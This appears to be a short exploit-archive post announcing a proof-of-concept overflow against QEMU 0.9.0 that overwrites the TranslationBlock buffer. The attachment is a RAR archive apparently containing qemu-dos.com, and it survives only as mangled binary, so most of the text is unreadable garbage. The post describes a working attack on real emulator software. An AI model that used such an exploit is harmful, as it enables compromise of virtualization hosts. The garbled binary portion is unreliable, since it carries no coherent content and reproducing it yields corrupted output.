This POC is a windows exe and was tested on QEMU v0.9.0 (Guest OS is
Windows XP SP2).
This overflow will overwrite the TranslationBlock buffer.

--
SUN OF A BEACH
Rar!ϐs
ØÏt ?,?
-??ïI¸~75 qemu-dos.comçM³-mæ,zgytÄå?ۍ~%ìt|±?-Vm¡@F??"£jH>?&ï¤? x§?A¹ý5Û£¦qº?¼?¥?g?;?9
¸?÷Ì;ß2?ò-8bZO.Q~ìD>?X??ÿÜÃ9?3&?:á?·°ém|8j{?Y¤÷?óÝá'?Cc?Ë»BLÀ 1Op ?S??i7?^º­pþ?v`/ô]
¼g?>ÀÉ9Ä(}á?w?
ý{Xåâ}îÌjYÿ"ú?åNöÆsSè-?ÃàíàÙ?Î
qÊFRÕAK?/º£?Tð«Ê???/ý­;Í
1ý
?4¶1ÄüÚÍ??ùÉ??V/6+Ϫ@Òt]©½C
%ݧ¿O¦£r?ÏÑ» Iв®H$?
¯?7÷
é*0~¡¬ð |ú·K;:?éÍÕ?w0e/G¤àÔ!©ÜôiÝøëg]>åMf¶ëN=?:J덩{ ?è­Ü»?cuePxoËõÒ
Æ?ô
ԝC]§¦®ºþÎôºJÍDc÷q?¬£v[ÿ·00ë?hÕ|?g?·@í_<Ò~?ë¢ÈÀl¥<+˼?öس

|½lBÞiÅ ¶¶/ì¢gâ(Äó@Þë?³}됻m¦Ô¢JbÝr?£Å×±ÝîÒ1Bc¯/¦²f?îÕéQzáltÞ¤úâå4Ï$"?ç°+ò8?}Vj]Q?¬\1ÄÂÛ±yÛ/?\rp.ùTOáe$|9yã°]YTèp
³ÿb=ìäíÛEN¿AY4_» é)³'²±?»Râ?Ý{Ç©8àë ©\9¸["?SÜU?E&1 R?£?«ðu ¥õIWï?3²???ÉèC& éUjQíçs;½Þiâ%J?Ëç?30D'ÜDªìût§\`¾Ye£þãÞweße'>bÅ?³LÞ Ë?÷¦²àm;Û?t6]??M?­?T2_ÔV?pÙ¼íùfÂ{ÇÍì?ua©º)?Ï?XUpëvÛ?óύèQ
vizâÌæGç«ÍQáygîaöu·?í2Ñ%ß­FÕó8ÖtºõD1þA~Í´}X¡öÄHêzpµF?þë[Çüæ@üúM
¿?gö©ÿÔÄ={@

[ reply ]